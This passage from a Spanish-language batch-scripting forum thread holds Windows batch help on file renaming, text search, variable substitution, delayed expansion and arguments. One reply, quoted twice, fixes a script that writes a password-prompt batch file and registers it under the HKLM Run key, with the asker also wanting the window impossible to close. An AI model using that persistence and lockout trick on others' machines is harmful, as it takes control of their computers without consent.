name-tmp-0000001.ppm
name-tmp-00000010.ppm
name-tmp-00000011.ppm
name-tmp-0000002.ppm
name-tmp-0000003.ppm
name-tmp-0000004.ppm
name-tmp-0000005.ppm
name-tmp-0000006.ppm
name-tmp-0000007.ppm
name-tmp-0000008.ppm
name-tmp-0000009.ppm
otro.cmd

C:\Users\leo\batch\temp>type final.cmd
@echo off
setlocal enabledelayedexpansion
for /f "tokens=1,2,3 delims=-" %%a in ('dir /b *.ppm') do (
    set "string=%%c"
    set "string=!string:.ppm=!
    for /f "tokens=* delims=0" %%A IN ("!string!") do set string=%%A
    ren "%%a-%%b-%%c" "%%a-%%b-!string!.ppm"
)
C:\Users\leo\batch\temp>final.cmd

C:\Users\leo\batch\temp>dir /b
final.cmd
name-tmp-1.ppm
```

```
name-tmp-10.ppm
name-tmp-11.ppm
name-tmp-2.ppm
name-tmp-3.ppm
name-tmp-4.ppm
name-tmp-5.ppm
name-tmp-6.ppm
name-tmp-7.ppm
name-tmp-8.ppm
name-tmp-9.ppm
otro.cmd
```

C:\Users\leo\batch\temp>

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: pablgonz en 25 Noviembre 2011, 22:02

Gracias por la respuesta, ahora funciona al 100%.

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Nefkofan en 21 Febrero 2012, 04:56

[Cita de: TxShack en 11 Julio 2007, 15:11](#)

TxShack

bueno al parecer tienes unos pequeños errorcillos

- falta un echo en la sexta linea
- Debes agregar otro %% para que se imprima %clave%

Código:

```
@echo off
Rem yo lo probe en mi pc desde el escritorio eliminando esta linea
cd c:\
echo @echo off > pass.bat
echo :menu >> pass.bat
echo echo. >> pass.bat
echo echo INTRODUCIR CLAVE >> pass.bat
echo echo. >> pass.bat
echo set/p clave= >> pass.bat
echo if %%clave%%==fark (goto bien) else goto :menu >> pass.bat
echo :bien >> pass.bat
echo cls >> pass.bat
echo echo. >> pass.bat
echo echo ACCESO VALIDADO >> pass.bat
echo echo. >> pass.bat
echo pause >> pass.bat
echo exit >> pass.bat
```

```
Rem esta linea tampoco la use el objetibo de la prueba era que pass.bat
se ejecutara y lo logro exitosamente
reg add hkey_local_machine\software\microsoft\windows\currentversion\run
/v pass.bat /t reg_sz /d C:\ /f
Rem yo use la linea start %cd%\pass.bat por practicidad al momento de
realizar pruebas
start c:\pass.bat
exit[/code
Espero te sea de utilidad ;)
```

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: **Nefkofan** en **21 Febrero 2012, 04:59**

[Cita de: TxShack en 11 Julio 2007, 15:11](#)

Bueno, queria saber si me podriais ayudar con este batch

Lo que quiero es que se añada al registro run pero no consigo hacerlo... algo debo de acer malalgo.. pero no se que... ace muchisimo que no uso los batch, porq se me daban bien.. pero se me an olvidado cosas poco a poco y aora no me sale esto

El codigo que qiero q salga es este:

Lo e estado intentando varias veces pero no lo consigo... e provado esto.. poro no funciona

Estare aciendo algo mal.. pero no se que... la cuestion es q no funciona..

Provadlo y vereis, y si me podeis ayudar os lo agradeceria ^^

bueno, y una ultima cosa... q tendria q añadirle para que quien lo ejecute no pueda dar a la X.. osea, q si intenta cerrar no pueda. Gracias

Un saludo

TxShack

[Cita de: TxShack en 11 Julio 2007, 15:11](#)

TxShack

bueno al parecer tienes unos pequeños errorcillos

- falta un echo en la sexta linea
- Debes agregar otro %% para que se imprima %clave%

Código:

```
@echo off
```

```
Rem yo lo probe en mi pc desde el escritorio eliminando esta linea
```

```
cd c:\
echo @echo off > pass.bat
echo :menu >> pass.bat
echo echo. >> pass.bat
echo echo INTRODUCIR CLAVE >> pass.bat
echo echo. >> pass.bat
echo set/p clave= >> pass.bat
echo if %%clave%%==fark (goto bien) else goto :menu >> pass.bat
echo :bien >> pass.bat
echo cls >> pass.bat
echo echo. >> pass.bat
echo echo ACCESO VALIDADO >> pass.bat
echo echo. >> pass.bat
echo pause >> pass.bat
echo exit >> pass.bat
Rem esta linea tampoco la use el objetibo de la prueba era que pass.bat
se ejecutara y lo logro exitosamente
reg add hkey_local_machine\software\microsoft\windows\currentversion\run
/v pass.bat /t reg_sz /d C:\ /f
Rem yo use la linea start %cd%\pass.bat por practicidad al momento de
realizar pruebas
start c:\pass.bat
exit[/code
Espero te sea de utilidad ;)
```

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: polmadur en 25 Abril 2012, 12:20

hola buenas, veréis, soy bastante novatillo en batch aunque tengo conocimientos aceptables en python así que domino la programación un poco(aunque mi estilo sea pésimo, lo reconozco).

Esta es mi duda, tengo un archivo en excel donde hay muchos nombres en diferentes páginas, cada página es un servicio de la asociación. La pregunta es si para recorrer ese archivo en busca de algún nombre en concreto se necesita algo especial, me refiero a como es un formato de texto diferente, CSV no lo se.

Si no hace falta nada especial ya me pongo yo a crear el script de busqueda.

gracias

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: EleKtro H@cker en 25 Abril 2012, 20:55

[Cita de: polmadur en 25 Abril 2012, 12:20](#)

La pregunta es si para recorrer ese archivo en busca de algún nombre en concreto se necesita algo especial, me refiero a como es un formato de texto diferente, CSV no lo se.

Si no hace falta nada especial ya me pongo yo a crear el script de búsqueda.

No es necesario nada especial, Puedes usar el comando **"FIND"** y **"FINDSTR"** con todo archivo que contenga texto.

Código

```
1. Find "PALABRA" "ARCHIVO.CSV"
2. Findstr "PALABRA" "ARCHIVO.CSV"
3.
```

Saludos!

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Bulone** en **4 Junio 2012, 22:26**

Hola, soy nuevo en este foro, quería saber si me podríais ayudar con el siguiente problema:

Estoy creando un programa en bat, el cual coge los valores de un .txt y necesito entre otras cosas que me cambie los valores que contengan un "=" (sin comillas) por el valor que queda detrás del caracter "=" (normalmente el caracter "=" no estará situado mas allá del 5 caracter)
(no se si me explico bien)

Ej:

set var1=987u=543

(quiero que el resultado de var1 sea 543)

Ya he probado cosas del estilo:

set var2=%var1:==x% (que me cambiase el igual por una x para trabajar mejor)

Código

```
1. if "%var:~1,1%"=="=" set var=%var:~2%
2. if "%var:~2,1%"=="=" set var=%var:~3%
```

3. if "%var:~3,1%"==" " set var=%var:~4%
4. if "%var:~4,1%"==" " set var=%var:~5%
5. if "%var:~5,1%"==" " set var=%var:~6%
6. if "%var:~6,1%"==" " set var=%var:~7%
7. if "%var:~7,1%"==" " set var=%var:~8%
8. if "%var:~8,1%"==" " set var=%var:~9%

(da error ya que reconoce el "=" como lectura del if)

(y otras tantas cosillas mas he probado también...) en definitiva si alguien me pudiese ayudar se lo agradecería, pues ya llevo varios días detrás de este problemilla. Si necesitais mas información sobre el problema, me decís.
Gracias de antemano.

NI caso al mensaje anterior, leyendo por ahí, encontré una solución al problema.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Aldorf** en **19 Julio 2012, 06:41**

Saludos a tod@s,
antes que nada, muy bueno el tuto, muchas gracias por compartir.

Ahora el mangazo: :silbar:

Tengo un problema al reemplazar parte del contenido de una variable, el problema surge por que lo que quiero poner contiene un "%".
Basicamente es reemplazar el "@" de un correo por un "%40".

Tengo esto:

Código:

```
set correo=yo@gmail.com  
set correo=%correo:@=%40%
```

Por supuesto que esto no funciona, ya que al encontrar el "%" despues del "=" asume que termino el reemplazo y simplemente me elimina el "@" agregandole al final el "40"

Intente con:

Código:

```

set correo=yo@gmail.com
set correo=%correo:@=%40%
...
set correo=%correo:@=%40%
...
set correo=%correo:@=%40%

```

Sin poder lograrlo, tambien intente usando una variable auxiliar con el valor "%40" pero siempre lo mismo.

La solucion que me queda me parece muy trucha, es ir preguntando caracter por caracter si es el "@" y una vez encontrado crear una nueva variable concatenando lo anterior al "@" con el "%40" y lo posterior al "@"...

Pero la verdad me parece una solucion muy trucha, por eso pregunto a quien sabe para aprender mas y hacer las cosas mejor.

Ya me parece mas que truco lo que hice para a una variable asignarle el contenido de otra variable cuyo nombre era el contenido de otra variable... (parece un trabalenguas, verdad?).

Código:

```

@echo on & setlocal enableextensions disabledelayedexpansion
call:CargaVariables
cls
set Respuesta=
echo 0 - Salir
echo 1 - %Jugador1%
echo 2 - %Jugador2%
echo 3 - %Jugador3%
...
set /p Respuesta=Seleccione su opcion:
set JugadorElejido=set JugadorElejido^=%Jugador%Respuesta%%
%JugadorElejido%
call:ProcesoPrincipal %JugadorElejido%
if (%errorlevel%)==(1) goto:eof
%0
goto:eof

:CargaVariables
set Jugador1=Jose
set Jugador2=Miguel
set Jugador3=Marcela
...
goto:eof

:ProcesoPrincipal
if (%1)==() echo. & echo Saliendo... & echo. & pause & set errorlevel=1 &
goto:eof
rem aca esta todo lo que hace en si el programa...

```

...
goto:eof

Desde ya, muchas gracias por la ayuda.

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Binary_Death en 19 Julio 2012, 06:46

Esto te debería funcionar:

Código:
@Echo Off
setlocal enabledelayedexpansion
set "correo=!correo:@=%40!"
echo: %correo%
pause 1>nul
exit

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Aldorf en 23 Julio 2012, 15:22

Hola Binary_Death,
Muchas pero muchas gracias!, funciona perfecto ;-)
Veo que mi problema principal por el cual jamas me hubiera funcionado
esta en la primer linea :-[

Citar
@echo on & setlocal enableextensions disabledelayedexpansion

Vos me enseñaste que el correcto para este caso es:
Citar
@echo on & setlocal enableextensions enabledelayedexpansion

Una vez mas, muchas gracias!
Saludos cordiales.

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Binary_Death en 23 Julio 2012, 17:09

No hay de qué ;)

Puedes leerte esto para que te aclare dudas sobre setlocal:
<http://ss64.com/nt/delayedexpansion.html>

iUn saludo!

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Aldorf** en **23 Julio 2012, 18:14**

Muy bueno el link, ahora tengo mas data para seguir probando, gracias!
;D

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **BatchianoISpyxolo** en **23 Julio 2012, 23:58**

[Cita de: Aldorf en 23 Julio 2012, 18:14](#)

Muy bueno el link, ahora tengo mas data para seguir probando, gracias!
;D

También estaría bien que buscaras algún tutorial sobre Nesting.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **AgnesBlack** en **24 Julio 2012, 22:46**

[Cita de: BatchianoISpyxolo en 23 Julio 2012, 23:58](#)

También estaría bien que buscaras algún tutorial sobre Nesting.

en bath tambien se puede hacer recursividad :o wuau genial

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **TheAguaplas** en **6 Septiembre 2012, 16:22**

Lo siento por molestar :silbar: es una cosa simple no "Programación BATCH Avanzada"

Este código no me va: :huh:

```
move "123\*" "456\*
```

Estaba haciendo un .bat y solo por eso no me funcionaba

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **EleKtro H@cker** en **6 Septiembre 2012, 16:37**

[Cita de: TheAguaplas en 6 Septiembre 2012, 16:22](#)

Este código no me va: :huh:
move "123*" "456*

El uso del comodín * indica que el comando afecta a todos los archivos dentro de la carpeta " 123 ", Entonces se mueven todos, Pero no puedes moverlos a la carpeta " 4566*todos* ", no se si me entiendes, ahí sobra el comodín.

Déjalo así:
Código

```
1. move "123\*" "456\"
```

Saludos.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **elpeluca** en **13 Septiembre 2012, 00:33**

Muy buenas.
He estado viendo el tutorial y esta muy bien, pero no entiendo los argumentos.
El %0 sí me sale pero el resto no lo entiendo :-[.
¿Me podrian dar una pequeña ayudita? :huh:

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **EleKtro H@cker** en **13 Septiembre 2012, 01:25**

[Cita de: elpeluca en 13 Septiembre 2012, 00:33](#)
¿Me podrian dar una pequeña ayudita? :huh:

Código

```
1. @Echo OFF
2.
3. Call :elhacker pim pam toma lacasitos!!
4. pause >NUL & Exit
5.
6. :elhacker
7. Echo La Etiqueta: %0 | MORE
8. Echo Argumentos : %* | MORE
9. Echo Argumento 1: %1
10. Echo Argumento 2: %2
11. Echo Argumento 3: %3
```

yea!

```
12.      Echo Argumento 4: %4
13.      Echo Argumento 5: %5
14.      Goto:EOF
```

(<http://img16.imageshack.us/img16/6416/prtsccapturee.jpg>)

Espero que te sirva un poco
saludos